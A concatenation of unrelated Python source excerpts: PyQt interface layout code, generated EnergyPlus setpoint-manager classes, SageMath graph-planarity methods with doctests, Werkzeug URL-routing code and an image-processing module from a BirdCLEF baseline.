self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_45 = QtWidgets.QLabel(self.calibration2_groupbox)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
| |
if `value` is not a valid value
Returns:
str: the value of `zone_inlet_node_name` or None if not set
"""
return self["Zone Inlet Node Name"]
@zone_inlet_node_name.setter
def zone_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Zone Inlet Node Name`"""
self["Zone Inlet Node Name"] = value
@property
def setpoint_node_or_nodelist_name(self):
"""field `Setpoint Node or NodeList Name`
| Node(s) at which the temperature will be set
Args:
value (str): value for IDD Field `Setpoint Node or NodeList Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `setpoint_node_or_nodelist_name` or None if not set
"""
return self["Setpoint Node or NodeList Name"]
@setpoint_node_or_nodelist_name.setter
def setpoint_node_or_nodelist_name(self, value=None):
"""Corresponds to IDD field `Setpoint Node or NodeList Name`"""
self["Setpoint Node or NodeList Name"] = value
class SetpointManagerSingleZoneHeating(DataObject):
""" Corresponds to IDD object `SetpointManager:SingleZone:Heating`
This setpoint manager detects the control zone load to meet the current heating
setpoint, zone inlet node flow rate, and zone node temperature, and calculates a
setpoint temperature for the supply air that will satisfy the zone heating load for
the control zone.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'control variable',
{'name': u'Control Variable',
'pyname': u'control_variable',
'default': u'Temperature',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Temperature'],
'autocalculatable': False,
'type': 'alpha'}),
(u'minimum supply air temperature',
{'name': u'Minimum Supply Air Temperature',
'pyname': u'minimum_supply_air_temperature',
'default': -99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'maximum supply air temperature',
{'name': u'Maximum Supply Air Temperature',
'pyname': u'maximum_supply_air_temperature',
'default': 99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'control zone name',
{'name': u'Control Zone Name',
'pyname': u'control_zone_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone node name',
{'name': u'Zone Node Name',
'pyname': u'zone_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'zone inlet node name',
{'name': u'Zone Inlet Node Name',
'pyname': u'zone_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'setpoint node or nodelist name',
{'name': u'Setpoint Node or NodeList Name',
'pyname': u'setpoint_node_or_nodelist_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'})]),
'format': None,
'group': u'Setpoint Managers',
'min-fields': 8,
'name': u'SetpointManager:SingleZone:Heating',
'pyname': u'SetpointManagerSingleZoneHeating',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def control_variable(self):
"""field `Control Variable`
| Default value: Temperature
Args:
value (str): value for IDD Field `Control Variable`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_variable` or None if not set
"""
return self["Control Variable"]
@control_variable.setter
def control_variable(self, value="Temperature"):
"""Corresponds to IDD field `Control Variable`"""
self["Control Variable"] = value
@property
def minimum_supply_air_temperature(self):
"""field `Minimum Supply Air Temperature`
| Units: C
| Default value: -99.0
Args:
value (float): value for IDD Field `Minimum Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_supply_air_temperature` or None if not set
"""
return self["Minimum Supply Air Temperature"]
@minimum_supply_air_temperature.setter
def minimum_supply_air_temperature(self, value=-99.0):
"""Corresponds to IDD field `Minimum Supply Air Temperature`"""
self["Minimum Supply Air Temperature"] = value
@property
def maximum_supply_air_temperature(self):
"""field `Maximum Supply Air Temperature`
| Units: C
| Default value: 99.0
Args:
value (float): value for IDD Field `Maximum Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_supply_air_temperature` or None if not set
"""
return self["Maximum Supply Air Temperature"]
@maximum_supply_air_temperature.setter
def maximum_supply_air_temperature(self, value=99.0):
"""Corresponds to IDD field `Maximum Supply Air Temperature`"""
self["Maximum Supply Air Temperature"] = value
@property
def control_zone_name(self):
"""field `Control Zone Name`
Args:
value (str): value for IDD Field `Control Zone Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_zone_name` or None if not set
"""
return self["Control Zone Name"]
@control_zone_name.setter
def control_zone_name(self, value=None):
"""Corresponds to IDD field `Control Zone Name`"""
self["Control Zone Name"] = value
@property
def zone_node_name(self):
"""field `Zone Node Name`
Args:
value (str): value for IDD Field `Zone Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_node_name` or None if not set
"""
return self["Zone Node Name"]
@zone_node_name.setter
def zone_node_name(self, value=None):
"""Corresponds to IDD field `Zone Node Name`"""
self["Zone Node Name"] = value
@property
def zone_inlet_node_name(self):
"""field `Zone Inlet Node Name`
Args:
value (str): value for IDD Field `Zone Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_inlet_node_name` or None if not set
"""
return self["Zone Inlet Node Name"]
@zone_inlet_node_name.setter
def zone_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Zone Inlet Node Name`"""
self["Zone Inlet Node Name"] = value
@property
def setpoint_node_or_nodelist_name(self):
"""field `Setpoint Node or NodeList Name`
| Node(s) at which the temperature will be set
Args:
value (str): value for IDD Field `Setpoint Node or NodeList Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `setpoint_node_or_nodelist_name` or None if not set
"""
return self["Setpoint Node or NodeList Name"]
@setpoint_node_or_nodelist_name.setter
def setpoint_node_or_nodelist_name(self, value=None):
"""Corresponds to IDD field `Setpoint Node or NodeList Name`"""
self["Setpoint Node or NodeList Name"] = value
class SetpointManagerSingleZoneCooling(DataObject):
""" Corresponds to IDD object `SetpointManager:SingleZone:Cooling`
This setpoint manager detects the control zone load to meet the current cooling
setpoint, zone inlet node flow rate, and zone node temperature, and calculates a
setpoint temperature for the supply air that will satisfy the zone cooling load for
the control zone.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'control variable',
{'name': u'Control Variable',
'pyname': u'control_variable',
'default': u'Temperature',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Temperature'],
'autocalculatable': False,
'type': 'alpha'}),
(u'minimum supply air temperature',
{'name': u'Minimum Supply Air Temperature',
'pyname': u'minimum_supply_air_temperature',
'default': -99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'maximum supply air temperature',
{'name': u'Maximum Supply Air Temperature',
'pyname': u'maximum_supply_air_temperature',
'default': 99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'control zone name',
{'name': u'Control Zone Name',
'pyname': u'control_zone_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone node name',
{'name': u'Zone Node Name',
'pyname': u'zone_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'zone inlet node name',
{'name': u'Zone Inlet Node Name',
'pyname': u'zone_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'setpoint node or nodelist name',
{'name': u'Setpoint Node or NodeList Name',
'pyname': u'setpoint_node_or_nodelist_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'})]),
'format': None,
'group': u'Setpoint Managers',
'min-fields': 8,
'name': u'SetpointManager:SingleZone:Cooling',
'pyname': u'SetpointManagerSingleZoneCooling',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def control_variable(self):
"""field `Control Variable`
| Default value: Temperature
Args:
value (str): value for IDD Field `Control Variable`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_variable` or None if not set
"""
return self["Control Variable"]
@control_variable.setter
def control_variable(self, value="Temperature"):
"""Corresponds to IDD field `Control Variable`"""
self["Control Variable"] = value
@property
def minimum_supply_air_temperature(self):
"""field `Minimum Supply Air Temperature`
| Units: C
| Default value: -99.0
Args:
value (float): value for IDD Field `Minimum Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_supply_air_temperature` or None if not set
"""
return self["Minimum Supply Air Temperature"]
@minimum_supply_air_temperature.setter
def minimum_supply_air_temperature(self, value=-99.0):
"""Corresponds to IDD field `Minimum Supply Air Temperature`"""
self["Minimum Supply Air Temperature"] = value
@property
def maximum_supply_air_temperature(self):
"""field `Maximum Supply Air Temperature`
| Units: C
| Default value: 99.0
Args:
value (float): value for IDD Field `Maximum Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value | |
as the second tuple entry. If the graph is planar, returns
``None`` as the second entry. When set to ``False``, only a boolean
answer is returned.
- ``set_embedding`` -- boolean (default: ``False``); whether to set the
instance field variable that contains a combinatorial embedding
(clockwise ordering of neighbors at each vertex). This value will only
be set if a planar embedding is found. It is stored as a Python dict:
``v1: [n1,n2,n3]`` where ``v1`` is a vertex and ``n1,n2,n3`` are its
neighbors.
- ``set_pos`` -- boolean (default: ``False``); whether to set the
position dictionary (for plotting) to reflect the combinatorial
embedding. Note that this value will default to False if set_emb is
set to False. Also, the position dictionary will only be updated if a
planar embedding is found.
EXAMPLES::
sage: g = graphs.CubeGraph(4)
sage: g.is_planar()
False
::
sage: g = graphs.CircularLadderGraph(4)
sage: g.is_planar(set_embedding=True)
True
sage: g.get_embedding()
{0: [1, 4, 3],
1: [2, 5, 0],
2: [3, 6, 1],
3: [0, 7, 2],
4: [0, 5, 7],
5: [1, 6, 4],
6: [2, 7, 5],
7: [4, 6, 3]}
::
sage: g = graphs.PetersenGraph()
sage: (g.is_planar(kuratowski=True))[1].adjacency_matrix()
[0 1 0 0 0 1 0 0 0]
[1 0 1 0 0 0 1 0 0]
[0 1 0 1 0 0 0 1 0]
[0 0 1 0 0 0 0 0 1]
[0 0 0 0 0 0 1 1 0]
[1 0 0 0 0 0 0 1 1]
[0 1 0 0 1 0 0 0 1]
[0 0 1 0 1 1 0 0 0]
[0 0 0 1 0 1 1 0 0]
::
sage: k43 = graphs.CompleteBipartiteGraph(4, 3)
sage: result = k43.is_planar(kuratowski=True); result
(False, Graph on 6 vertices)
sage: result[1].is_isomorphic(graphs.CompleteBipartiteGraph(3, 3))
True
Multi-edged and looped graphs are partially supported::
sage: G = Graph({0: [1, 1]}, multiedges=True)
sage: G.is_planar()
True
sage: G.is_planar(on_embedding={})
Traceback (most recent call last):
...
NotImplementedError: cannot compute with embeddings of multiple-edged or looped graphs
sage: G.is_planar(set_pos=True)
Traceback (most recent call last):
...
NotImplementedError: cannot compute with embeddings of multiple-edged or looped graphs
sage: G.is_planar(set_embedding=True)
Traceback (most recent call last):
...
NotImplementedError: cannot compute with embeddings of multiple-edged or looped graphs
sage: G.is_planar(kuratowski=True)
(True, None)
::
sage: G = graphs.CompleteGraph(5)
sage: G = Graph(G, multiedges=True)
sage: G.add_edge(0, 1)
sage: G.is_planar()
False
sage: b,k = G.is_planar(kuratowski=True)
sage: b
False
sage: k.vertices()
[0, 1, 2, 3, 4]
TESTS:
:trac:`18045`::
sage: g = graphs.CompleteGraph(4)
sage: g.is_planar(set_embedding=True)
True
sage: emb = {0 : [2,3,1], 1: [2,3,0], 2: [1,3,0], 3:[0,1,2]}
sage: g.is_planar(on_embedding=emb)
False
:trac:`19193`::
sage: posets.BooleanLattice(3).cover_relations_graph().is_planar()
True
Corner cases::
sage: graphs.EmptyGraph().is_planar()
True
sage: Graph(1).is_planar()
True
"""
# Quick check first
if (on_embedding is None and not kuratowski and not set_embedding and not set_pos
and not self.allows_loops() and not self.allows_multiple_edges()):
if self.order() > 4 and self.size() > 3 * self.order() - 6:
return False
if self.has_multiple_edges() or self.has_loops():
if set_embedding or (on_embedding is not None) or set_pos:
raise NotImplementedError("cannot compute with embeddings of multiple-edged or looped graphs")
else:
return self.to_simple().is_planar(kuratowski=kuratowski)
if on_embedding is not None:
self._check_embedding_validity(on_embedding,boolean=False)
return (0 == self.genus(minimal=False, set_embedding=False, on_embedding=on_embedding))
else:
from sage.graphs.planarity import is_planar
G = self.to_undirected()
if hasattr(G, '_immutable'):
G = copy(G)
planar = is_planar(G,kuratowski=kuratowski, set_pos=set_pos, set_embedding=set_embedding)
if kuratowski:
bool_result = planar[0]
else:
bool_result = planar
if bool_result:
if set_pos:
self._pos = G._pos
if set_embedding:
self._embedding = G._embedding
return planar
def is_circular_planar(self, on_embedding=None, kuratowski=False,
set_embedding=True, boundary=None,
ordered=False, set_pos=False):
r"""
Check whether the graph is circular planar (outerplanar)
A graph is circular planar if it has a planar embedding in which all
vertices can be drawn in order on a circle. This method can also be used
to check the existence of a planar embedding in which the vertices of a
specific set (the *boundary*) can be drawn on a circle, all other
vertices being drawn inside of the circle. An order can be defined on
the vertices of the boundary in order to define how they are to appear
on the circle.
INPUT:
- ``on_embedding`` -- dictionary (default: ``None``); the embedding
dictionary to test planarity on (i.e.: will return ``True`` or
``False`` only for the given embedding)
- ``kuratowski`` -- boolean (default: ``False``); whether to return a
tuple with boolean first entry and the Kuratowski subgraph (i.e. an
edge subdivision of `K_5` or `K_{3,3}`) as the second entry (see
OUTPUT below)
- ``set_embedding`` -- boolean (default: ``True``); whether or not to
set the instance field variable that contains a combinatorial
embedding (clockwise ordering of neighbors at each vertex). This value
will only be set if a circular planar embedding is found. It is stored
as a Python dict: ``v1: [n1,n2,n3]`` where ``v1`` is a vertex and
``n1,n2,n3`` are its neighbors.
- ``boundary`` -- list (default: ``None``); an ordered list of vertices
that are required to be drawn on the circle, all others being drawn
inside of it. It is set to ``None`` by default, meaning that *all*
vertices should be drawn on the boundary.
- ``ordered`` -- boolean (default: ``False``); whether or not to
consider the order of the boundary. It required ``boundary`` to be
defined.
- ``set_pos`` -- boolean (default: ``False``); whether or not to set the
position dictionary (for plotting) to reflect the combinatorial
embedding. Note that this value will default to ``False`` if
``set_embedding`` is set to ``False``. Also, the position dictionary
will only be updated if a circular planar embedding is found.
OUTPUT:
The method returns ``True`` if the graph is circular planar, and
``False`` if it is not.
If ``kuratowski`` is set to ``True``, then this function will return a
tuple, whose first entry is a boolean and whose second entry is the
Kuratowski subgraph (i.e. an edge subdivision of `K_5` or `K_{3,3}`)
isolated by the Boyer-Myrvold algorithm. Note that this graph might
contain a vertex or edges that were not in the initial graph. These
would be elements referred to below as parts of the wheel and the star,
which were added to the graph to require that the boundary can be drawn
on the boundary of a disc, with all other vertices drawn inside (and no
edge crossings).
ALGORITHM:
This is a linear time algorithm to test for circular planarity. It
relies on the edge-addition planarity algorithm due to Boyer-Myrvold. We
accomplish linear time for circular planarity by modifying the graph
before running the general planarity algorithm.
REFERENCE:
[BM2004]_
EXAMPLES::
sage: g439 = Graph({1: [5, 7], 2: [5, 6], 3: [6, 7], 4: [5, 6, 7]})
sage: g439.show()
sage: g439.is_circular_planar(boundary=[1, 2, 3, 4])
False
sage: g439.is_circular_planar(kuratowski=True, boundary=[1, 2, 3, 4])
(False, Graph on 8 vertices)
sage: g439.is_circular_planar(kuratowski=True, boundary=[1, 2, 3])
(True, None)
sage: g439.get_embedding()
{1: [7, 5],
2: [5, 6],
3: [6, 7],
4: [7, 6, 5],
5: [1, 4, 2],
6: [2, 4, 3],
7: [3, 4, 1]}
Order matters::
sage: K23 = graphs.CompleteBipartiteGraph(2, 3)
sage: K23.is_circular_planar(boundary=[0, 1, 2, 3])
True
sage: K23.is_circular_planar(ordered=True, boundary=[0, 1, 2, 3])
False
With a different order::
sage: K23.is_circular_planar(set_embedding=True, boundary=[0, 2, 1, 3])
True
TESTS:
Corner cases::
sage: graphs.EmptyGraph().is_circular_planar()
True
sage: Graph(1).is_circular_planar()
True
"""
if ordered and boundary is None:
raise ValueError("boundary must be set when ordered is True")
# Quick check first
if (on_embedding is None and not kuratowski and set_embedding and
boundary is None and not ordered and not set_pos and
not self.allows_loops() and not self.allows_multiple_edges()):
if self.order() > 3 and self.size() > 2 * self.order() - 3:
return False
if boundary is None:
boundary = self
# A local copy of self
from sage.graphs.graph import Graph
from sage.graphs.planarity import is_planar
graph = Graph(self)
if hasattr(graph, '_embedding'):
del(graph._embedding)
# Adds a new vertex to the graph and connects it to all vertices of the
# boundary
extra = graph.add_vertex()
graph.add_edges((vertex, extra) for vertex in boundary)
extra_edges = []
# When ordered is True, we need a way to make sure | |
raise BadHost()
return MapAdapter(
self,
server_name,
script_name,
subdomain,
url_scheme,
path_info,
default_method,
query_args,
)
def bind_to_environ(self, environ, server_name=None, subdomain=None):
"""Like :meth:`bind` but you can pass it an WSGI environment and it
will fetch the information from that dictionary. Note that because of
limitations in the protocol there is no way to get the current
subdomain and real `server_name` from the environment. If you don't
provide it, Werkzeug will use `SERVER_NAME` and `SERVER_PORT` (or
`HTTP_HOST` if provided) as used `server_name` with disabled subdomain
feature.
If `subdomain` is `None` but an environment and a server name is
provided it will calculate the current subdomain automatically.
Example: `server_name` is ``'example.com'`` and the `SERVER_NAME`
in the wsgi `environ` is ``'staging.dev.example.com'`` the calculated
subdomain will be ``'staging.dev'``.
If the object passed as environ has an environ attribute, the value of
this attribute is used instead. This allows you to pass request
objects. Additionally `PATH_INFO` added as a default of the
:class:`MapAdapter` so that you don't have to pass the path info to
the match method.
.. versionchanged:: 1.0.0
If the passed server name specifies port 443, it will match
if the incoming scheme is ``https`` without a port.
.. versionchanged:: 1.0.0
A warning is shown when the passed server name does not
match the incoming WSGI server name.
.. versionchanged:: 0.8
This will no longer raise a ValueError when an unexpected server
name was passed.
.. versionchanged:: 0.5
previously this method accepted a bogus `calculate_subdomain`
parameter that did not have any effect. It was removed because
of that.
:param environ: a WSGI environment.
:param server_name: an optional server name hint (see above).
:param subdomain: optionally the current subdomain (see above).
"""
environ = _get_environ(environ)
wsgi_server_name = get_host(environ).lower()
scheme = environ["wsgi.url_scheme"]
if server_name is None:
server_name = wsgi_server_name
else:
server_name = server_name.lower()
# strip standard port to match get_host()
if scheme == "http" and server_name.endswith(":80"):
server_name = server_name[:-3]
elif scheme == "https" and server_name.endswith(":443"):
server_name = server_name[:-4]
if subdomain is None and not self.host_matching:
cur_server_name = wsgi_server_name.split(".")
real_server_name = server_name.split(".")
offset = -len(real_server_name)
if cur_server_name[offset:] != real_server_name:
# This can happen even with valid configs if the server was
# accessed directly by IP address under some situations.
# Instead of raising an exception like in Werkzeug 0.7 or
# earlier we go by an invalid subdomain which will result
# in a 404 error on matching.
warnings.warn(
f"Current server name {wsgi_server_name!r} doesn't match configured"
f" server name {server_name!r}",
stacklevel=2,
)
subdomain = "<invalid>"
else:
subdomain = ".".join(filter(None, cur_server_name[:offset]))
def _get_wsgi_string(name):
val = environ.get(name)
if val is not None:
return _wsgi_decoding_dance(val, self.charset)
script_name = _get_wsgi_string("SCRIPT_NAME")
path_info = _get_wsgi_string("PATH_INFO")
query_args = _get_wsgi_string("QUERY_STRING")
return Map.bind(
self,
server_name,
script_name,
subdomain,
scheme,
environ["REQUEST_METHOD"],
path_info,
query_args=query_args,
)
def update(self):
"""Called before matching and building to keep the compiled rules
in the correct order after things changed.
"""
if not self._remap:
return
with self._remap_lock:
if not self._remap:
return
self._rules.sort(key=lambda x: x.match_compare_key())
for rules in self._rules_by_endpoint.values():
rules.sort(key=lambda x: x.build_compare_key())
self._remap = False
def __repr__(self):
rules = self.iter_rules()
return f"{type(self).__name__}({pformat(list(rules))})"
class MapAdapter:
"""Returned by :meth:`Map.bind` or :meth:`Map.bind_to_environ` and does
the URL matching and building based on runtime information.
"""
def __init__(
self,
map,
server_name,
script_name,
subdomain,
url_scheme,
path_info,
default_method,
query_args=None,
):
self.map = map
self.server_name = _to_str(server_name)
script_name = _to_str(script_name)
if not script_name.endswith("/"):
script_name += "/"
self.script_name = script_name
self.subdomain = _to_str(subdomain)
self.url_scheme = _to_str(url_scheme)
self.path_info = _to_str(path_info)
self.default_method = _to_str(default_method)
self.query_args = query_args
self.websocket = self.url_scheme in {"ws", "wss"}
def dispatch(
self, view_func, path_info=None, method=None, catch_http_exceptions=False
):
"""Does the complete dispatching process. `view_func` is called with
the endpoint and a dict with the values for the view. It should
look up the view function, call it, and return a response object
or WSGI application. http exceptions are not caught by default
so that applications can display nicer error messages by just
catching them by hand. If you want to stick with the default
error messages you can pass it ``catch_http_exceptions=True`` and
it will catch the http exceptions.
Here a small example for the dispatch usage::
from werkzeug.wrappers import Request, Response
from werkzeug.wsgi import responder
from werkzeug.routing import Map, Rule
def on_index(request):
return Response('Hello from the index')
url_map = Map([Rule('/', endpoint='index')])
views = {'index': on_index}
@responder
def application(environ, start_response):
request = Request(environ)
urls = url_map.bind_to_environ(environ)
return urls.dispatch(lambda e, v: views[e](request, **v),
catch_http_exceptions=True)
Keep in mind that this method might return exception objects, too, so
use :class:`Response.force_type` to get a response object.
:param view_func: a function that is called with the endpoint as
first argument and the value dict as second. Has
to dispatch to the actual view function with this
information. (see above)
:param path_info: the path info to use for matching. Overrides the
path info specified on binding.
:param method: the HTTP method used for matching. Overrides the
method specified on binding.
:param catch_http_exceptions: set to `True` to catch any of the
werkzeug :class:`HTTPException`\\s.
"""
try:
try:
endpoint, args = self.match(path_info, method)
except RequestRedirect as e:
return e
return view_func(endpoint, args)
except HTTPException as e:
if catch_http_exceptions:
return e
raise
def match(
self,
path_info=None,
method=None,
return_rule=False,
query_args=None,
websocket=None,
):
"""The usage is simple: you just pass the match method the current
path info as well as the method (which defaults to `GET`). The
following things can then happen:
- you receive a `NotFound` exception that indicates that no URL is
matching. A `NotFound` exception is also a WSGI application you
can call to get a default page not found page (happens to be the
same object as `werkzeug.exceptions.NotFound`)
- you receive a `MethodNotAllowed` exception that indicates that there
is a match for this URL but not for the current request method.
This is useful for RESTful applications.
- you receive a `RequestRedirect` exception with a `new_url`
attribute. This exception is used to notify you about a request
Werkzeug requests from your WSGI application. This is for example the
case if you request ``/foo`` although the correct URL is ``/foo/``
You can use the `RequestRedirect` instance as response-like object
similar to all other subclasses of `HTTPException`.
- you receive a ``WebsocketMismatch`` exception if the only
match is a WebSocket rule but the bind is an HTTP request, or
if the match is an HTTP rule but the bind is a WebSocket
request.
- you get a tuple in the form ``(endpoint, arguments)`` if there is
a match (unless `return_rule` is True, in which case you get a tuple
in the form ``(rule, arguments)``)
If the path info is not passed to the match method the default path
info of the map is used (defaults to the root URL if not defined
explicitly).
All of the exceptions raised are subclasses of `HTTPException` so they
can be used as WSGI responses. They will all render generic error or
redirect pages.
Here is a small example for matching:
>>> m = Map([
... Rule('/', endpoint='index'),
... Rule('/downloads/', endpoint='downloads/index'),
... Rule('/downloads/<int:id>', endpoint='downloads/show')
... ])
>>> urls = m.bind("example.com", "/")
>>> urls.match("/", "GET")
('index', {})
>>> urls.match("/downloads/42")
('downloads/show', {'id': 42})
And here is what happens on redirect and missing URLs:
>>> urls.match("/downloads")
Traceback (most recent call last):
...
RequestRedirect: http://example.com/downloads/
>>> urls.match("/missing")
Traceback (most recent call last):
...
NotFound: 404 Not Found
:param path_info: the path info to use for matching. Overrides the
path info specified on binding.
:param method: the HTTP method used for matching. Overrides the
method specified on binding.
:param return_rule: return the rule that matched instead of just the
endpoint (defaults to `False`).
:param query_args: optional query arguments that are used for
automatic redirects as string or dictionary. It's
currently not possible to use the query arguments
for URL matching.
:param websocket: Match WebSocket instead of HTTP requests. A
websocket request has a ``ws`` or ``wss``
:attr:`url_scheme`. This overrides that detection.
.. versionadded:: 1.0
Added ``websocket``.
.. | |
<reponame>cresposito/BirdCLEF-Baseline
# This file includes basic functionality for image processing
# including i/o handling, image augmentation and model input pre-processing
# Author: <NAME>, 2018, Chemnitz University of Technology
import sys
sys.path.append("..")
import copy
import numpy as np
import cv2
######################## CONFIG ##########################
import config as cfg
#Fixed random seed
RANDOM = cfg.getRandomState()
def resetRandomState():
global RANDOM
RANDOM = cfg.getRandomState()
########################## I/O ###########################
def openImage(path, im_dim=1):
# Open image
if im_dim == 3:
img = cv2.imread(path, 1)
else:
img = cv2.imread(path, 0)
# Convert to floats between 0 and 1
img = np.asarray(img / 255., dtype='float32')
return img
def showImage(img, name='IMAGE', timeout=-1):
cv2.imshow(name, img)
cv2.waitKey(timeout)
def saveImage(img, path):
cv2.imwrite(path, img)
#################### PRE-PROCESSING ######################
def normalize(img, zero_center=False):
# Normalize
if not img.min() == 0 and not img.max() == 0:
img -= img.min()
img /= img.max()
else:
img = img.clip(0, 1)
# Use values between -1 and 1
if zero_center:
img -= 0.5
img *= 2
return img
def substractMean(img, clip=True):
# Only suitable for RGB images
if len(img.shape) == 3:
# Normalized image?
if img.max() <= 1.0:
img[:, :, 0] -= 0.4850 #B
img[:, :, 1] -= 0.4579 #G
img[:, :, 2] -= 0.4076 #R
else:
img[:, :, 0] -= 123.680 #B
img[:, :, 1] -= 116.779 #G
img[:, :, 2] -= 103.939 #R
else:
img -= np.mean(img)
# Clip values
if clip:
img = img.clip(0, img.max())
return img
def prepare(img):
# ConvNet inputs in Theano are 4D-vectors: (batch size, channels, height, width)
# Add axis if grayscale image
if len(img.shape) == 2:
img = img[:, :, np.newaxis]
# Transpose axis, channels = axis 0
img = np.transpose(img, (2, 0, 1))
# Add new dimension
img = np.expand_dims(img, 0)
return img
######################## RESIZING ########################
def resize(img, width, height, mode='squeeze'):
if img.shape[:2] == (height, width):
return img
if mode == 'crop' or mode == 'cropCenter':
img = cropCenter(img, width, height)
elif mode == 'cropRandom':
img = cropRandom(img, width, height)
elif mode == 'fill':
img = fill(img, width, height)
else:
img = squeeze(img, width, height)
return img
def squeeze(img, width, height):
# Squeeze resize: Resize image and ignore aspect ratio
return cv2.resize(img, (width, height), interpolation=cv2.INTER_CUBIC)
def cropRandom(img, width, height):
# Random crop: Scale shortest side to minsize, crop with random offset
# Original image shape
h, w = img.shape[:2]
aspect_ratio = float(max(h, w)) / float(min(h, w))
# Scale original image
minsize = int(max(width, height) * 1.1)
if w <= h and w < minsize:
img = squeeze(img, minsize, int(minsize * aspect_ratio))
elif h < w and h < minsize:
img = squeeze(img, int(minsize * aspect_ratio), minsize)
#crop with random offset
h, w = img.shape[:2]
top = RANDOM.randint(0, h - height)
left = RANDOM.randint(0, w - width)
new_img = img[top:top + height, left:left + width]
return new_img
def cropCenter(img, width, height):
# Center crop: Scale shortest side, crop longer side
# Original image shape
h, w = img.shape[:2]
aspect_ratio = float(max(h, w)) / float(min(h, w))
# Scale original image
if w == h:
img = squeeze(img, max(width, height), max(width, height))
elif width >= height:
if h >= w:
img = squeeze(img, width, int(width * aspect_ratio))
else:
img = squeeze(img, int(height * aspect_ratio), height)
else:
if h >= w:
img = squeeze(img, int(height / aspect_ratio), height)
else:
img = squeeze(img, int(height * aspect_ratio), height)
#Crop from original image
top = (img.shape[0] - height) // 2
left = (img.shape[1] - width) // 2
new_img = img[top:top + height, left:left + width]
return new_img
def fill(img, width, height):
# Fill mode: Scale longest side, pad shorter side with noise
# Determine new shape
try:
new_shape = (height, width, img.shape[2])
except:
new_shape = (height, width)
# Allocate array with noise
new_img = RANDOM.normal(0.0, 1.0, new_shape)
# Original image shape
h, w = img.shape[:2]
aspect_ratio = float(max(h, w)) / float(min(h, w))
# Scale original image
if w == h:
img = squeeze(img, min(width, height), min(width, height))
elif width >= height:
if h >= w:
img = squeeze(img, int(height / aspect_ratio), height)
else:
img = squeeze(img, width, int(width / aspect_ratio))
else:
if h >= w:
img = squeeze(img, width, int(width * aspect_ratio))
else:
img = squeeze(img, width, int(width / aspect_ratio))
# Place original image at center of new image
top = (height - img.shape[0]) // 2
left = (width - img.shape[1]) // 2
new_img[top:top + img.shape[0], left:left + img.shape[1]] = img
return new_img
###################### AUGMENTATION ######################
def augment(img, augmentation={}, count=3, probability=0.5):
# Make working copy
augmentations = copy.deepcopy(augmentation)
# Choose number of augmentations according to count
# Count = 3 means either 0, 1, 2 or 3 different augmentations
while(count > 0 and len(augmentations) > 0):
# Roll the dice if we do augment or not
if RANDOM.choice([True, False], p=[probability, 1 - probability]):
# Choose one method
aug = RANDOM.choice(augmentations.keys())
# Call augementation methods
if aug == 'flip':
img = flip(img, augmentations[aug])
elif aug == 'rotate':
img = rotate(img, augmentations[aug])
elif aug == 'zoom':
img = zoom(img, augmentations[aug])
elif aug == 'crop':
if isinstance(augmentations[aug], float):
